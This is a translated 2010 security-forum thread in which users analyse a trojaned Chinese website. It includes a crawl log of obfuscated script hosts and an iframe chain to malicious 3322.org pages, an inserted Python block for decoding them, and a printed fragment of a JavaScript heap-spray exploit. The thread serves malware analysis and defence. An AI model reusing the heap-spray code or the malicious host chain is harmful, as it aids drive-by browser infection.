Rising Kaka Security Forum

Technical Exchange » Malicious Website Discussion » http://www.gzdljy.com/huadu/
青松1 - 2010-4-13 11:13:00
Has this site been trojaned (drive-by)??

User system info: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.0.3705)
networkedition - 2010-4-13 11:28:00
Log is generated by FreShow.
[wide]http://www.gzdljy.com/huadu/
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
        [frame]http://asd1233.3322.org:97/xo/dk.html
            [script]http://js.tongji.linezing.com/1566155/tongji.js
            [frame]http://asd1233.3322.org:97/xo/0.htm
                [frame]http://asd1233.3322.org:97/xo/../0.htm
                    [object]http://kjy6fj.3322.org:28/www.baidu.com
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/inc/rest_img.js
    [script]http://www.gzdljy.com/huadu/today.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/ads/js.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
青松1 - 2010-4-13 11:36:00
Mod, please explain http://asd1233.3322.org:97/xo/../0.htm
How do you decode this one?
Every time I get to this point I can't decode it.
青松1 - 2010-4-13 11:45:00
Waiting.......
湖心小筑 - 2010-4-13 12:57:00


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


For the code above, use redoce's decoder: run "8>HexASCII" once to clear that layer, then use "A>Xor" (XOR) key search with the keyword changed from http:// to var.

I was too busy at noon, the code was incomplete and caused errors, sorry.
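A worked example of the two decoding steps that come up in this thread: undoing the percent-encoded script hostnames in networkedition's FreShow log, and the "8>HexASCII, then A>Xor key search with the keyword set to var" procedure described in the post above. This is added example code in Python, not a tool from the forum and not redoce itself; the log lines are a constructed subset copied from the log above, and the XOR sample is constructed with an assumed key 0x37.

```python
import re
from urllib.parse import unquote, urlsplit

# --- Part 1: undo percent-encoded hostnames in a FreShow-style crawl log ---

# Constructed sample: a few lines in the shape of the FreShow log above. The
# script-src hostnames are percent-encoded so that the real domains do not
# appear literally in the page source.
FRESHOW_LOG = """\
[wide]http://www.gzdljy.com/huadu/
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
        [frame]http://asd1233.3322.org:97/xo/dk.html
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
"""

LINE_RE = re.compile(r"^\s*\[(\w+)\](\S+)$")


def decode_log_hosts(log: str) -> list[tuple[str, str, bool]]:
    """Parse a FreShow-style log into (tag, decoded_host, was_encoded) tuples.

    The host part is percent-decoded before it is lowercased, so a hostname
    such as nj%65%38.cn is reported as nje8.cn; was_encoded marks entries
    whose raw host contained percent-escapes, a cheap obfuscation signal
    worth alerting on, since a legitimate script src has no reason to hide
    its domain this way.
    """
    out = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tag, url = m.group(1), m.group(2)
        netloc = urlsplit(url).netloc
        host = unquote(netloc).split(":")[0].lower()
        out.append((tag, host, "%" in netloc))
    return out


def encoded_hosts(log: str) -> list[str]:
    """Unique decoded hostnames that were hidden behind percent-encoding."""
    seen = []
    for _tag, host, was_encoded in decode_log_hosts(log):
        if was_encoded and host not in seen:
            seen.append(host)
    return seen


# --- Part 2: the HexASCII -> XOR key-search step from the post above ---

HEX_RE = re.compile(r"[^0-9A-Fa-f]")


def hex_ascii_decode(text: str) -> bytes:
    """Strip everything that is not a hex digit and decode the pairs
    (this is what the '8>HexASCII' step of the post does)."""
    digits = HEX_RE.sub("", text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits)


def recover_xor_key(hex_text: str, crib: bytes = b"var"):
    """Try every single-byte XOR key on the hex-decoded data and return
    (key, plaintext) for the first key whose output contains the crib.

    The post sets the crib to 'var' because the hidden layer is JavaScript
    source that starts with a variable declaration rather than a URL,
    so the default 'http://' keyword never matches.
    """
    data = hex_ascii_decode(hex_text)
    for key in range(256):
        candidate = bytes(b ^ key for b in data)
        if crib in candidate:
            return key, candidate.decode("latin-1")
    return None


# Constructed sample: a harmless one-line script, XORed with the assumed
# key 0x37 and written out as space-separated hex, the layering the post
# describes.
SAMPLE_PLAINTEXT = "var s='ok';alert(s);"
SAMPLE_KEY = 0x37
SAMPLE_HEX = " ".join(f"{ord(c) ^ SAMPLE_KEY:02X}" for c in SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    for host in encoded_hosts(FRESHOW_LOG):
        print("percent-encoded script host:", host)
    print(recover_xor_key(SAMPLE_HEX))
```

The known-plaintext search is only as good as the crib: a three-byte crib against a single-byte key can in principle match a wrong key on a long input, so in practice you check that the returned text is mostly printable before trusting it. The decoded hostnames are the artefact a defender actually wants from the log, since they can go straight into a blocklist or a proxy log search.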
networkedition - 2010-4-13 13:22:00
This method doesn't seem to decode it :kaka2:
青松1 - 2010-4-13 14:43:00
Yeah, nothing came out. Could senior mod networkedition decode it once more, thanks.
青松1 - 2010-4-13 15:04:00
The mod has gone quiet again.
networkedition - 2010-4-13 15:10:00
I do have a decoding tool :kaka12:
zzzkkkmmm - 2010-4-13 15:20:00
I want it too,
青松1 - 2010-4-13 16:10:00
Post it as an attachment so we can download it, don't be so stingy :kaka12:
青松1 - 2010-4-13 16:14:00
Good things should be shared with everyone, looking forward to it....
湖心小筑 - 2010-4-13 16:23:00
It can be decoded; it's just that my code wasn't copied completely, hehe. Go copy the code yourselves. Sorry, I was busy preparing materials at noon, so I just copied it quickly and missed the beginning.
青松1 - 2010-4-13 16:26:00
??
湖心小筑 - 2010-4-13 16:30:00
Go look at post #5, I have re-edited it.
青松1 - 2010-4-13 16:32:00
To keep antivirus software from flagging it, I have temporarily deleted the source code.
湖心小筑 - 2010-4-13 16:33:00
Actually the issue 48 bounty can also be solved with this method: get the shellcode, then analyze it in OD.
青松1 - 2010-4-13 16:39:00
No, it can't.
The decoded result is below:
var oaho='ADB7E=6'+WMAHWM+'8EE';
var ANHEI=oaho+'';
var YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn=unescape(LHAH+HHAH+SSAH+oah+ANHEI);
wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg=new Array();
var NLIIOaWEWq=0x86000-(YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn.length*2);
var dsMkdcprbruIIcGlpqSnwUJwUMYTKSv=unescape('');
while(dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.length<NLIIOaWEWq/2){
dsMkdcprbruIIcGlpqSnwUJwUMYTKSv+=dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;

}var xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri=dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.substring(0,NLIIOaWEWq/2);
delete dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;

for(tQknUbSupHPbocFX=0; tQknUbSupHPbocFX<270; tQknUbSupHPbocFX++) {
wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg[tQknUbSupHPbocFX] =xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn;
};
VMJrJ6="NaN";XFqgKq0="NaN";qAdsItC2="NaN";NhCq2="NaN";kNays8="NaN";kiKJ8="NaN";dgmbGiI1="NaN";DQqFD1="NaN";NWnV8="NaN";NAMp6="NaN";kizW2="NaN";geln3="NaN";Wsinphw6="NaN";sMUokcU1="NaN";tqqMG4="NaN";
湖心小筑 - 2010-4-13 16:40:00
Add me on QQ, 860880883. Either way is fine with me, but I don't like posting; posting is too tiring, QQ directly is easier.